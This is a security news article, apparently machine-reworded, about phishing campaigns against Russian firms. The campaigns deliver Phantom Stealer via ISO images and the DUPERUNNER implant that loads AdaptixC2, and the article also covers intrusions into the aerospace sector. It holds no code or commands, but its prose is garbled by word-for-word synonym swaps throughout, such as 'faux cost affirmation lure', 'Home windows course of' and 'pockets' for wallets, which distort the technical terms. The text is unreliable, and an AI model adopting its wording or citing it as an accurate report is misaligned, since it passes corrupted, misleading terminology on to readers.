Dec 15, 2025Ravie LakshmananMalware / Cybercrime
Cybersecurity researchers have disclosed particulars of an energetic phishing marketing campaign that is concentrating on a variety of sectors in Russia with phishing emails that ship Phantom Stealer by way of malicious ISO optical disc pictures.
The exercise, codenamed Operation MoneyMount-ISO by Seqrite Labs, has primarily singled out finance and accounting entities, with these within the procurement, authorized, payroll verticals rising as secondary targets.
“This marketing campaign employs a faux cost affirmation lure to ship the Phantom information-stealing malware by way of a multi-stage attachment chain,” the cybersecurity firm stated.
The an infection chain begins with a phishing electronic mail that masquerades as legit monetary communications, urging recipients to substantiate a latest financial institution switch. Connected to the e-mail is a ZIP archive that claims to comprise further particulars, however, as a substitute, comprises an ISO file that, when launched, mounts on the system as a digital CD drive.
The ISO picture (“Подтверждение банковского перевода.iso” or “Financial institution switch affirmation.iso”) serves as an executable that is designed to launch Phantom Stealer via an embedded DLL (“CreativeAI.dll”).
Phantom Stealer is able to extracting knowledge from cryptocurrency pockets browser extensions put in in Chromium-based browsers and desktop pockets apps, in addition to seize recordsdata, Discord authentication tokens, and browser-related passwords, cookies, and bank card particulars.
It additionally displays clipboard content material, logs keystrokes, and runs a sequence of checks to detect virtualized, sandboxed, or evaluation environments, and if that’s the case, aborts its execution. Information exfiltration is achieved by way of a Telegram bot or to an attacker-controlled Discord webhook. On high of that, the stealer permits file switch to an FTP server.
In latest months, Russian organizations, primarily human assets and payroll departments, have additionally been focused by phishing emails that make use of lures associated to bonuses or inside monetary insurance policies to deploy a beforehand undocumented implant named DUPERUNNER that hundreds AdaptixC2, an open-source command-and-control (C2) framework.
Dubbed DupeHike, the marketing campaign has been attributed to a menace cluster named UNG0902.
“The ZIP has been used as a preliminary supply of spear-phishing-based an infection containing decoys with PDF and LNK extension, which downloads the implant DUPERUNNER, which lastly executes the Adaptix C2 Beacon,” Seqrite stated.
The LNK file (“Документ_1_О_размере_годовой_премии.pdf.lnk” or “Document_1_On_the_amount_of_the_annual_bonus.pdf.lnk”), in flip, proceeds to obtain DUPERUNNER from an exterior server utilizing “powershell.exe.” The first accountability of the implant is to retrieve and show a decoy PDF and launch AdaptixC2 by injecting it right into a legit Home windows course of like “explorer.exe,” “notepad.exe,” and “msedge.exe.”
Different phishing campaigns have taken goal at finance, authorized, and aerospace sectors in Russia to distribute Cobalt Strike and malicious instruments like Formbook, DarkWatchman, and PhantomRemote which might be able to knowledge theft and hands-on keyboard management. The e-mail servers of compromised Russian firms are used to ship the spear-phishing messages.
French cybersecurity firm Intrinsec has attributed the intrusion set concentrating on the Russian aerospace trade to hacktivists aligned with Ukrainian pursuits. The exercise, detected between June and September 2025, shares overlaps with Hive0117, Operation CargoTalon, and Rainbow Hyena (aka Fairy Trickster, Head Mare, and PhantomCore).
A few of these efforts have additionally been discovered to redirect customers to phishing login pages hosted on the InterPlanetary File System (IPFS) and Vercel, designed to steal credentials related to Microsoft Outlook and Bureau 1440, a Russian aerospace firm.
“The campaigns noticed between June and September 2025 […] geared toward compromising entities actively cooperating with Russia’s military amidst the present battle with Ukraine, largely assessed by the Western sanctions imposed on them,” Intrinsec stated.
